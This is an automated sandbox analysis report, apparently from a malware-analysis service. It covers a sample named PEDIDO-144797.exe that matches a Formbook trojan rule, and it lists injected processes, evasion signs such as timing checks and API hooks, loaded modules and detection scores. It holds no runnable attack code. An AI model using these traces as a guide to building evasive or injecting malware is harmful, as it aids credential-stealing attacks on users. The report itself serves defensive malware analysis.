        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D3CB4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D3F39
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EED2EC
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB124C
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EF1380
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBF330
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F0E310
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB70F1
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F0B0D0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EF00A0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F3508C
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FAE076
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F1B1E0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F051C0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F4717A
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F9D130
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FC010E
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EEF113
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBF6F6
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EFC6E0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F736EC
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBA6C0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F00680
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F24670
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FAD646
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F9D62C
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F1C600
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F02760
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F0A760
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB6757
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F00445
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBF5C9
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB75C6
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FCA526
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F1FAA0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBFA89
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBEA5B
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBCA13
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F74BC0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBFB2E
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F00B10
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F3DB19
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB78F3
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB18DA
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F028C0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F798B2
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F16882
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F09870
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F1B870
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EE6868
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBF872
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FA0835
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F2E810
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F03800
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F459C0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EFE9A0
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FBE9A6
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02EF2EE8
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02FB9ED2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F01EB24_2_02F01EB2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB0EAD4_2_02FB0EAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FA0E6D4_2_02FA0E6D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F20E504_2_02F20E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F42E484_2_02F42E48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F06FE04_2_02F06FE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB1FC64_2_02FB1FC6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBEFBF4_2_02FBEFBF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFF634_2_02FBFF63
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0CF004_2_02F0CF00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1FCE04_2_02F1FCE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FCACEB4_2_02FCACEB
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F18CDF4_2_02F18CDF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F99C984_2_02F99C98
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F03C604_2_02F03C60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB6C694_2_02FB6C69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBEC604_2_02FBEC60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FAEC4C4_2_02FAEC4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0AC204_2_02F0AC20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF0C124_2_02EF0C12
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F9FDF44_2_02F9FDF4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F09DD04_2_02F09DD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F12DB04_2_02F12DB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F00D694_2_02F00D69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB7D4C4_2_02FB7D4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFD274_2_02FBFD27
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EFAD004_2_02EFAD00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDEEBA4_2_02DDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE3074_2_02DDE307
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE1E84_2_02DDE1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDC9B34_2_02DDC9B3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE69D4_2_02DDE69D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDD7084_2_02DDD708
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE46D4_2_02DDE46D
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: String function: 02F6E692 appears 84 times
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: String function: 02F35050 appears 36 times
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: String function: 02EEB910 appears 266 times
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: String function: 02F47BE4 appears 88 times
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: String function: 02F7EF10 appears 105 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: String function: 3269B910 appears 185 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: String function: 326F7BE4 appears 70 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: String function: 3271E692 appears 59 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: String function: 3272EF10 appears 72 times
        Source: PEDIDO-144797.exe	Static PE information: invalid certificate
        Source: PEDIDO-144797.exe, 00000000.00000000.89358556370.0000000000457000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000325F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003243F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000000.89609016586.0000000000457000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032940000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe	Binary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe	Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine	Classification label: mal100.troj.evad.winEXE@5/8@2/2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_004020FE CoCreateInstance
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	File created: C:\Users\user\AppData\Local\Temp\nshDBF9.tmp
        Source: PEDIDO-144797.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: PEDIDO-144797.exe	ReversingLabs: Detection: 34%
        Source: PEDIDO-144797.exe	Virustotal: Detection: 38%
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	File read: C:\Users\user\Desktop\PEDIDO-144797.exe
        Source: unknown	Process created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Process created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: version.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: edgegdi.dll
        Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.ini
        Source: PEDIDO-144797.exe	Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144797.exe, PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        Source: Yara match	File source: 00000000.00000002.89703248997.000000000340F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326721AD pushad ; retf 0004h 2_2_3267223F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326797A1 push es; iretd 2_2_326797A8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326A08CD push ecx; mov dword ptr [esp], ecx 2_2_326A08D6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050CA10F push ecx; ret 3_2_050CA140
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050C9902 push edi; ret 3_2_050C9904
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050CA123 push ecx; ret 3_2_050CA140
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050CA5A2 push esp; retf 3_2_050CA579
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050C687F push ebx; iretd 3_2_050C6880
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050C689F push ds; ret 3_2_050C68A0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050CA4D6 push esp; retf 3_2_050CA579
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050D1366 pushfd ; ret 3_2_050D137E
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050D2376 push esi; iretd 3_2_050D2379
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050C9ED3 pushfd ; ret 3_2_050C9ED4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_050D12F4 pushfd ; ret 3_2_050D137E
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02EF08CD push ecx; mov dword ptr [esp], ecx 4_2_02EF08D6
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD4AD6 push esp; retf 4_2_02DD4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DDB2B8 push edi; retf 42F6h 4_2_02DDB325
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD4A0A push esp; retf 4_2_02DD4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DDB89A pushfd ; ret 4_2_02DDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DDC8AA push esi; iretd 4_2_02DDC8AD
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DE5032 push eax; ret 4_2_02DE5034
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DDB828 pushfd ; ret 4_2_02DDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD4657 push ecx; ret 4_2_02DD4674
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD4643 push ecx; ret 4_2_02DD4674
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD3E36 push edi; ret 4_2_02DD3E38
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD4407 pushfd ; ret 4_2_02DD4408
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD0DD3 push ds; ret 4_2_02DD0DD4
        Source: C:\Windows\SysWOW64\SecEdit.exe	Code function: 4_2_02DD0DB3 push ebx; iretd 4_2_02DD0DB4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	File created: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 3B6FC3A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 1E8FC3A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 7FFFAFCF0594
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 7FFFAFCEFF74
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 7FFFAFCED6C4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API/Special instruction interceptor: Address: 7FFFAFCED864
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED144
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCF0594
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED764
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED324
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED364
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED004
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCEFF74
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED6C4
        Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFFAFCED864
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326E1763 rdtsc
        Source: C:\Windows\SysWOW64\SecEdit.exe	Window / User API: threadDelayed 9852
        Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887
        Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API coverage: 0.5 %
